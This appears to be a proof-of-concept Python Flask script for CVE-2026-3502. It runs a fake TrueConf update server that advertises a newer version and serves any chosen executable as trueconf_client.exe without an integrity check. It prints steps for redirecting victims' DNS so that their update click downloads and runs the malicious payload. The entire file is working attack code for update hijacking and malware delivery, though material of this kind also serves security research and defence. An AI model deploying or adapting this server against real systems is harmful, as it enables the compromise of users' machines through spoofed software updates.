#!/usr/bin/env python3
"""
CVE-2026-3502 - Fake Update Server
Simula un servidor TrueConf comprometido que sirve actualizaciones maliciosas
"""

from flask import Flask, send_file, request, Response
import argparse
import os
import json
from colorama import init, Fore, Style

init(autoreset=True)

app = Flask(__name__)

# Configuración global
MALICIOUS_UPDATE_PATH = None
SERVER_VERSION = "8.5.2"
LEGITIMATE_VERSION = "8.5.1"

@app.route('/downlods/trueconf_client.exe')
def serve_malicious_update():
    """Sirve la actualización maliciosa"""
    if MALICIOUS_UPDATE_PATH and os.path.exists(MALICIOUS_UPDATE_PATH):
        print(f"{Fore.RED}[!] Serving malicious update to {request.remote_addr}{Style.RESET_ALL}")
        
        # Simular ausencia de verificación de integridad
        response = send_file(
            MALICIOUS_UPDATE_PATH,
            as_attachment=True,
            download_name='trueconf_client.exe'
        )
        
        # No incluir ETag o hash (vulnerabilidad)
        # response.headers['ETag'] = None
        
        return response
    else:
        print(f"{Fore.RED}[-] Malicious update not found{Style.RESET_ALL}")
        return "Update not available", 404

@app.route('/config')
def get_config():
    """Devuelve configuración del servidor con versión falsa"""
    config = {
        "version": SERVER_VERSION,
        "update_available": True,
        "client_version": LEGITIMATE_VERSION,
        "update_url": "/downlods/trueconf_client.exe"
    }
    return Response(json.dumps(config), mimetype='application/json')

@app.route('/version.js')
def get_version():
    """Devuelve versión para el cliente"""
    js_code = f'var build = "{SERVER_VERSION}";\nvar version = "{SERVER_VERSION}";'
    return Response(js_code, mimetype='application/javascript')

@app.route('/')
def index():
    """Página principal"""
    return """
    <html>
    <head><title>TrueConf Server (Compromised)</title></head>
    <body>
    <h1>TrueConf Server</h1>
    <p>Version: {}</p>
    <p>Status: <span style="color:red">COMPROMISED - Serving malicious updates</span></p>
    </body>
    </html>
    """.format(SERVER_VERSION)

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-3502 - Fake TrueConf Server')
    parser.add_argument('--update', required=True, help='Path to malicious update EXE')
    parser.add_argument('--port', type=int, default=443, help='Server port')
    parser.add_argument('--server-version', default='8.5.2', help='Fake server version')
    parser.add_argument('--client-version', default='8.5.1', help='Legitimate client version')
    
    args = parser.parse_args()
    
    global MALICIOUS_UPDATE_PATH, SERVER_VERSION, LEGITIMATE_VERSION
    MALICIOUS_UPDATE_PATH = args.update
    SERVER_VERSION = args.server_version
    LEGITIMATE_VERSION = args.client_version
    
    print(f"{Fore.RED}╔════════════════════════════════════════════════════════════╗{Style.RESET_ALL}")
    print(f"{Fore.RED}║  CVE-2026-3502 - Fake TrueConf Update Server              ║{Style.RESET_ALL}")
    print(f"{Fore.RED}║  Serving malicious updates to vulnerable clients         ║{Style.RESET_ALL}")
    print(f"{Fore.RED}╚════════════════════════════════════════════════════════════╝{Style.RESET_ALL}")
    
    print(f"\n{Fore.CYAN}[*] Server configuration:{Style.RESET_ALL}")
    print(f"    Malicious update: {MALICIOUS_UPDATE_PATH}")
    print(f"    Server version: {SERVER_VERSION}")
    print(f"    Client version (legit): {LEGITIMATE_VERSION}")
    print(f"    Port: {args.port}")
    
    print(f"\n{Fore.YELLOW}[!] Attack simulation:{Style.RESET_ALL}")
    print(f"    1. Configure victims' DNS to point to this server")
    print(f"    2. Victims will see update notification")
    print(f"    3. Clicking update downloads and executes malicious payload")
    
    print(f"\n{Fore.GREEN}[+] Starting malicious server on port {args.port}...{Style.RESET_ALL}")
    
    # Ejecutar servidor (sin SSL por simplicidad)
    app.run(host='0.0.0.0', port=args.port, debug=False)

if __name__ == "__main__":
    main()